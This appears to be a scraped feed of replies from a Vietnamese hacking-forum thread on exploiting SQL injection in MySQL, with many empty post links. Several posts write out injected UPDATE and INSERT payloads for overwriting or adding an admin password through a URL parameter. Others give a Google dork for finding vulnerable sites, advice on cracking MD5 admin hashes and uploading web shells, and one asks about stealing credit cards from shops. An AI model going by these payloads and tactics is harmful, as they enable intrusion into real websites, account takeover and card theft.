Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu? 99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả. 
hầu như password thu đc thời buổi này đều đc "mã hóa" như bác nói. có lẽ sql injection "lỗi thời" thật rồi bác à! mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ?  
sai lầm lớn nhất là câu này "mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ?"]]>
/hvaonline/posts/list/25210.html#187975 /hvaonline/posts/list/25210.html#187975 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

joaqujn wrote:
Cho mình hỏi với MySQL v3 liệu có cách nào khai thác ko? 
mysql v3 có cách khai thác, với mysql v3 không dùng union được vì nó không có vì vậy kỹ thuật inband sqli có lẽ là không dùng được, nhưng blind thì được ...]]>
/hvaonline/posts/list/25210.html#187977 /hvaonline/posts/list/25210.html#187977 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#188186 /hvaonline/posts/list/25210.html#188186 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#188191 /hvaonline/posts/list/25210.html#188191 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#188217 /hvaonline/posts/list/25210.html#188217 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
thứ nhất: đã học SQL thì cũng hiểu phần nào chứ sao có thể hiểu hết đc sql injection thứ hai: dựa vào kiến thức tự mình tìm hiểu đc mình thấy các bác phản bác câu hỏi của mình vô lý mình phải hỏi ngược lại cho ra nhẽ (bổ sung luôn lỗ hỗng của mình) chứ có gì lại bảo về ôm sách mà đọc thì ....  
---> sao cứ nhập nhằng chuyện kiến thức sql và chuyện sql injection mãi thế? Muốn hiểu được sql injection thì trước tiên phải thấu đáo sql statement (cụ thể cho từng loại database). Ngay cả một câu sql đơn giản bị báo lỗi mà còn không biết lý do tại sao thì làm sao mà "inject"? Khi nào nắm vững sql statements, khi ấy tự nhiên sẽ ngộ ra sql injection là cái gì thôi. Chưa đi được thì đừng cố chạy.]]>
/hvaonline/posts/list/25210.html#188224 /hvaonline/posts/list/25210.html#188224 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL conmale) chỉ muốn truyền đạt cho mọi người mấy cái chân lý "vô cùng đơn giản" thế này thôi: - Dùng cái gì thì đọc tài liệu về cái đó - Muốn 'hack' cái gì thì phải hiểu thật rõ cái đó - Luôn luôn phải xây cái "móng" trước và xây cho thật vững, đừng cố đốt cháy giai đoạn - Luôn luôn thể hiện mình đã mày mò, tìm tòi trước khi hỏi ... Bạn nào "ngộ" ra được mấy cái chân lý này thì sẽ nhanh tiến bộ (và có khi lại từ bỏ ý định hack hiếc này nọ, quay về cày quốc kiếm $ nuôi vợ con) còn bạn nào không hiểu hoặc cố tình không hiểu thì đành chịu vậy. PS: Còn thiếu cái "chân lý" nào ai bổ sung giúp mình với.]]> /hvaonline/posts/list/25210.html#188225 /hvaonline/posts/list/25210.html#188225 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#188249 /hvaonline/posts/list/25210.html#188249 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#190820 /hvaonline/posts/list/25210.html#190820 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#202418 /hvaonline/posts/list/25210.html#202418 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#203579 /hvaonline/posts/list/25210.html#203579 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#206728 /hvaonline/posts/list/25210.html#206728 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

nbthanh wrote:
Bài viết rất hay và xúc tích! Đây là 1 ví dụ kinh điển nhất cho - "muốn hack thì phải GIỎI những thứ CĂN BẢN / NỀN TẢNG trước như lập trình, SQL, v.v..." - và "khi đã GIỎI những thứ CĂN BẢN / NỀN TẢNG rồi thì tự nhiên sẽ biết hack" Chẳng hạn như không biết lập trình, không biết SQL, không biết những thứ nền tảng này thì có biết site bị lỗi cũng không biết đường nào mà khai thác. 
Bạn ơi, người VN hay giấu nghề lắm, các pro giờ muốn bỏ rơi các noobie, nên nói vậy đó, một noopbi luôn có câu hỏi làm sao biết 1 web site lỗi SQL, mình sẽ cho bạn 1 thủ thuật có thế quét lỗi bất kì một trang web nào thông qua công cụ SQL Inject Me , có lẽ sẽ thoả mãn câu hỏi của bạn. :^) (click vô link dưới đây) Cách quét lỗi SQL với mọi Website => http://my.opera.com/heocacavltk1/blog/show.dml/18190232 :D [i]]]>
/hvaonline/posts/list/25210.html#221756 /hvaonline/posts/list/25210.html#221756 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#223184 /hvaonline/posts/list/25210.html#223184 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

jizuba wrote:
các bác làm ơn cho em mạo muội hỏi 1 câu này nhá: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC Microsoft Access Driver] Data type mismatch in criteria expression. như bên trên là sao vậy :-/ .em chưa biết gì 
Là qua bên mục "Windows" và mở một chủ đề mới về "vỡ lòng MS SQL".]]>
/hvaonline/posts/list/25210.html#223187 /hvaonline/posts/list/25210.html#223187 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#224211 /hvaonline/posts/list/25210.html#224211 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

khucyeuthuong2 wrote:
cho em hỏi "Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1", ta có thể tìm được link này với bất kỳ trang web nào không?và bằng cách nào vậy?anh em giúp cho.em mới học nên còn kém lắm.thanks 
cái này muốn tìm thì vào google search
inurl: products.php?id= 
rồi check từng site bạn à:">]]>
/hvaonline/posts/list/25210.html#224251 /hvaonline/posts/list/25210.html#224251 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#233338 /hvaonline/posts/list/25210.html#233338 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#233951 /hvaonline/posts/list/25210.html#233951 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#234725 /hvaonline/posts/list/25210.html#234725 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL

h0ainiemdauyeu wrote:
lỗi này bây giờ đã fix hết rồi ,kiếm site bị lỗi kiểu này thực tập khó quá :( 
E cũng nghĩ thế! Nhưng e thấy bài viết này hữu ích quá :x Biết cách còn đề phòng :P ]]>
/hvaonline/posts/list/25210.html#238613 /hvaonline/posts/list/25210.html#238613 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#241419 /hvaonline/posts/list/25210.html#241419 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#250138 /hvaonline/posts/list/25210.html#250138 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#250184 /hvaonline/posts/list/25210.html#250184 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#256385 /hvaonline/posts/list/25210.html#256385 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#256525 /hvaonline/posts/list/25210.html#256525 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

caotrienx wrote:
Mình hack được user/pass: admin:57c4b03b07d5b098b92a0205dcca66d5 chuỗi md5 này ko giải mã được Theo 1 bài viết có cách hướng dẫn đổi pass hoặc record 1 newuser/newpass(newpass được đã được giải mã) khi biết được các table va column Để thay đổi password , có thể làm như sau: http://yoursite.com/index.php?id=10 UPDATE 'admin_login' SET 'password'= 'newpass' WHERE login_name='admin'-- Hoặc nếu bạn muốn một record mới(tạo một newuser/newpass) vào table: http://yoursite.com/index.php?id=10 INSERT INTO 'admin_login'('login_id', 'login_name', 'password') VALUES(`1`,'admin1','newpass')-- mình thử nhưng ko được kể cả khi chuyển login_name sang hex newuser=admin1=61646d696e31 INSERT INTO 'admin_login' ('login_id', 'login_name', 'password') VALUES (`1`, `0x61646d696e31`, `bf15876b12c0a194dcb842c3ec9cb078`)-- Ai cho mình biết sai ở đâu ko! 
Nói chung MySQL không phân biệt được lệnh bạn viết gì! vì phía sau select mà thêm câu lệnh insert,update, delete là sai vì phía sau nó là where hoặc union nói đơn giản là Nên học câu lệnh truy vấn trong SQL đi!]]>
/hvaonline/posts/list/25210.html#256770 /hvaonline/posts/list/25210.html#256770 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#257067 /hvaonline/posts/list/25210.html#257067 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#261295 /hvaonline/posts/list/25210.html#261295 GMT Hướng dẫn khai thác SQL Injection đối với MySQL Cơ Sở Dữ Liệu nữa! ]]> /hvaonline/posts/list/25210.html#261398 /hvaonline/posts/list/25210.html#261398 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#262259 /hvaonline/posts/list/25210.html#262259 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#262293 /hvaonline/posts/list/25210.html#262293 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#264598 /hvaonline/posts/list/25210.html#264598 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#265713 /hvaonline/posts/list/25210.html#265713 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#274935 /hvaonline/posts/list/25210.html#274935 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

khicon2893 wrote:
e8772a36a8f284c2060a70d16cb7d03a -> DAITHIENSON MD5 !! dùng findmyhash mà giải mã cậu ah!! 
Dạo này còn hack shop lấy đc cc không bác, mình đọc mấy ebook của hieupc ,tìm hiểu thêm trên mạng nữa , shop lỗi thì tìm ra nhưng mà làm theo mấy cái code của hiếu pc thì nó chẳng ra cái colum nào cả. hic...]]>
/hvaonline/posts/list/25210.html#274947 /hvaonline/posts/list/25210.html#274947 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#275513 /hvaonline/posts/list/25210.html#275513 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#275525 /hvaonline/posts/list/25210.html#275525 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#276783 /hvaonline/posts/list/25210.html#276783 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#276912 /hvaonline/posts/list/25210.html#276912 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#278988 /hvaonline/posts/list/25210.html#278988 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

hocquantrimang wrote:
đối với bài này là làm bằng tay nên có thể hơi mất công và khó nhớ, nhưng làm = tay cung có cái hay của làm bằng tay, nhiều khi làm = tools ko ra nhưng làm bằng tay lại ra. với bài này thì ta có thể dùng tools Havij để search sẽ rất nhanh có thể thấy được admin và mkMD5, cả link admin nữa, nhưng mã MD5 thì hên xui thôi, xài python trong backtrack còn xin lỗi chịu ko nổi chứ nói gì đến google mêt nghỉ, xài dictionary thì cũng 50/50 :v ko nói chắc được, vậy nên việc tìm kiếm password của admin thì mức độ khả thi vẫn là 50-50/ thế nên mới sinh ra việc khai thác web cho phép upload để đưa shell lên rồi chạy shell để chiếm quyền admin sau đó change pass của admin = pass đã được MD5 của mình vào, => mình là admin rồi , từ đó mới tấn côn các web khác. nhưng chỉ riêng việc upshell và chạy được nó đã là 1 điều ko đơn giản rồi.  
Do trong giới hạn của bài viết và yêu cầu, nên mình không muốn bình phẩm về chuyện tay hay tool. Về nguyên tắc thì tất cả những gì user có thể input đều sẽ được đưa vào ứng dụng, tuỳ theo ứng dụng có thể điểm input sẽ khác nhau và tất nhiên tuỳ theo khả năng nhận biết cùa hacker hoặc người muốn test. Skill và experience là những yếu tố mấu chốt đối với tester cũng như hacker Về chuyện tool hay tay, các bạn có thể xem 1 bài viết (khá cũ nhưng vẫn xem được) tại http://www.slideshare.net/itasvietnam/itasautomated-web-applicationscannervi. Các quyết đị tool nào hay tay nào sẽ là quyết định của chính bạn]]>
/hvaonline/posts/list/25210.html#279040 /hvaonline/posts/list/25210.html#279040 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#279198 /hvaonline/posts/list/25210.html#279198 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#280497 /hvaonline/posts/list/25210.html#280497 GMT Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/list/25210.html#281257 /hvaonline/posts/list/25210.html#281257 GMT